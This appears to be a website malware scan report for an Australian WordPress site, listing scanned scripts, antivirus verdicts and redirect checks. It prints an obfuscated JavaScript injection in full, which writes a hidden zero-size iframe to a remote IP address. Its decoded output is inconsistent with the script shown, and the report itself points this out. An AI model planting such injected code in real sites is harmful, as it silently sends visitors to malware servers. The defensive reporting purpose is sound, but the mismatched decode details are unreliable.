Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=youthinteraction.org.au
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://youthinteraction.org.au/ | 200 OK Content-Length: 38282 Content-Type: text/html | malicious |
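Malicious code - confirmed by antiviruses (see below):
var tds_url = 'ht' + 'tp:' + '//' + '91.' + '217.' + '91.' + '104' + '/'; var group = '?' + 'i' + 'd' + '=' + '1'; var charset = 'utf-8'; var referer = encodeURIComponent(document.referrer); var url = tds_url + '/' + group + '&se_referer=' + referer + '&charset=' + charset; document.write('<' + 'i' + 'f' + 'r' + 'a' + 'm' + 'e' + ' ' + 'w' + 'i' + 'd' + 't' + 'h' + '=' + '"' + '0' + '"' + ' ' + 'h' + 'e' + 'i' + 'g' + 'h' + 't' + '=' + '"' + '0' + '"' + ' ' + 'f' + 'r' + 'a' + 'm' + 'e' + 'b' + 'o' + 'r' + 'd' + 'e' + 'r' + '=' + '"' + '0' + '"' + ' ' + 's' + 'r' + 'c' + 'r' + 'o' + 'l' + 'l' + 'i' + 'n' + 'g' + '=' + '"' + 'n' + 'o' + '"' + ' ' + 's' + 'r' + 'c' + '="' + url + '">' + '<' + '/' + 'i' + 'f' + 'r' + 'a' + 'm' + 'e' + '>');
Decoded script:
<iframe width="0" height="0" frameborder="0" scrolling="no" src="http://193.203.50.43/?ftp&se_rrr=undefined&charset=utf-8"></iframe>
Note: the decoded iframe does not match the script shown above. The script concatenates its strings into a zero-size iframe whose src is http://91.217.91.104//?id=1&se_referer=<encoded document.referrer>&charset=utf-8, whereas the decoded output points to 193.203.50.43 with the query ?ftp&se_rrr=undefined. The decode appears to come from a different variant of the same injection, so both addresses should be treated as indicators when searching logs or site files. The single-character string splitting only serves to hide the words "http" and "iframe" from simple signature matching.
Antivirus reports: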
| ||
http://youthinteraction.org.au/wp-includes/js/comment-reply.min.js?ver=3.5.2 | 200 OK Content-Length: 786 Content-Type: application/javascript | clean |
http://youthinteraction.org.au/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: application/javascript | clean |
http://youthinteraction.org.au/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.3 | 200 OK Content-Length: 9986 Content-Type: application/javascript | clean |
http://youthinteraction.org.au/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.9995 | 200 OK Content-Length: 26590 Content-Type: application/javascript | clean |
http://youthinteraction.org.au/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.06 | 200 OK Content-Length: 1791 Content-Type: application/javascript | clean |
http://youthinteraction.org.au/wp-content/themes/suffusion/scripts/jquery.cycle.all.min.js | 200 OK Content-Length: 28855 Content-Type: application/javascript | clean |
http://youthinteraction.org.au/wp-content/themes/suffusion/scripts/suffusion.js?ver=4.4.6 | 200 OK Content-Length: 33979 Content-Type: application/javascript | clean |
http://youthinteraction.org.au/wp-content/themes/suffusion/dbx.js | 200 OK Content-Length: 47611 Content-Type: application/javascript | clean |
http://youthinteraction.org.au/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.9.2 | 200 OK Content-Length: 4693 Content-Type: application/javascript | clean |
http://youthinteraction.org.au/wp-includes/js/jquery/ui/jquery.ui.widget.min.js?ver=1.9.2 | 200 OK Content-Length: 6759 Content-Type: application/javascript | clean |
http://youthinteraction.org.au/wp-includes/js/jquery/ui/jquery.ui.progressbar.min.js?ver=1.9.2 | 200 OK Content-Length: 1589 Content-Type: application/javascript | clean |
http://youthinteraction.org.au/wp-content/plugins/wordpress-simple-survey/js/custom.js?ver=2.1.2 | 200 OK Content-Length: 2379 Content-Type: application/javascript | clean |
http://youthinteraction.org.au/wp-includes/js/tw-sack.min.js?ver=1.6.1 | 200 OK Content-Length: 3619 Content-Type: application/javascript | clean |
http://youthinteraction.org.au//ajax.googleapis.com/ajax/libs/prototype/1.7.1.0/prototype.js?ver=1.7.1/ | 200 OK Content-Length: 2488 Content-Type: text/html | malicious |
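Malicious code - confirmed by antiviruses (see below):
var tds_url = 'ht' + 'tp:' + '//' + '91.' + '217.' + '91.' + '104' + '/'; var group = '?' + 'i' + 'd' + '=' + '1'; var charset = 'utf-8'; var referer = encodeURIComponent(document.referrer); var url = tds_url + '/' + group + '&se_referer=' + referer + '&charset=' + charset; document.write('<' + 'i' + 'f' + 'r' + 'a' + 'm' + 'e' + ' ' + 'w' + 'i' + 'd' + 't' + 'h' + '=' + '"' + '0' + '"' + ' ' + 'h' + 'e' + 'i' + 'g' + 'h' + 't' + '=' + '"' + '0' + '"' + ' ' + 'f' + 'r' + 'a' + 'm' + 'e' + 'b' + 'o' + 'r' + 'd' + 'e' + 'r' + '=' + '"' + '0' + '"' + ' ' + 's' + 'c' + 'r' + 'o' + 'l' + 'l' + 'i' + 'n' + 'g' + '=' + '"' + 'n' + 'o' + '"' + ' ' + 's' + 'r' + 'c' + '="' + url + '">' + '<' + '/' + 'i' + 'f' + 'r' + 'a' + 'm' + 'e' + '>');
Decoded script:
<iframe width="0" height="0" frameborder="0" scrolling="no" src="http://193.203.50.43/?ftp&se_rrr=undefined&charset=utf-8"></iframe>
Note: the request URL for this entry has the protocol-relative reference //ajax.googleapis.com/... appended to the site's own host name, and the response is text/html rather than JavaScript. The flagged content is therefore presumably an HTML page served by youthinteraction.org.au itself, not the Prototype library from Google's CDN. That would mean the injection is present in the site's generated HTML in general rather than in one script file. As with the home page entry, the decoded iframe (193.203.50.43) differs from the address the displayed script builds (91.217.91.104), so both should be treated as indicators.
Antivirus reports: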
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: youthinteraction.org.au
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 13 Jan 2015 05:28:54 GMT
Server: nginx/1.6.2
Content-Type: text/html
GET / HTTP/1.1
Host: youthinteraction.org.au
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 13 Jan 2015 05:28:54 GMT
Server: nginx/1.6.2
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: youthinteraction.org.au
Referer: http://www.google.com/search?q=youthinteraction.org.au
Result:
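The result is similar to the first query. There are no suspicious redirects found. Note that this check compares HTTP responses only: the hidden iframe reported under "Scanned pages/files" is written into the page by client-side script (document.write), so it does not show up as an HTTP redirect and a clean result here does not mean the page is clean.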
GET / HTTP/1.1
Host: youthinteraction.org.au
Referer: http://www.google.com/search?q=youthinteraction.org.au
Result:
The result is similar to the first query. There are no suspicious redirects found.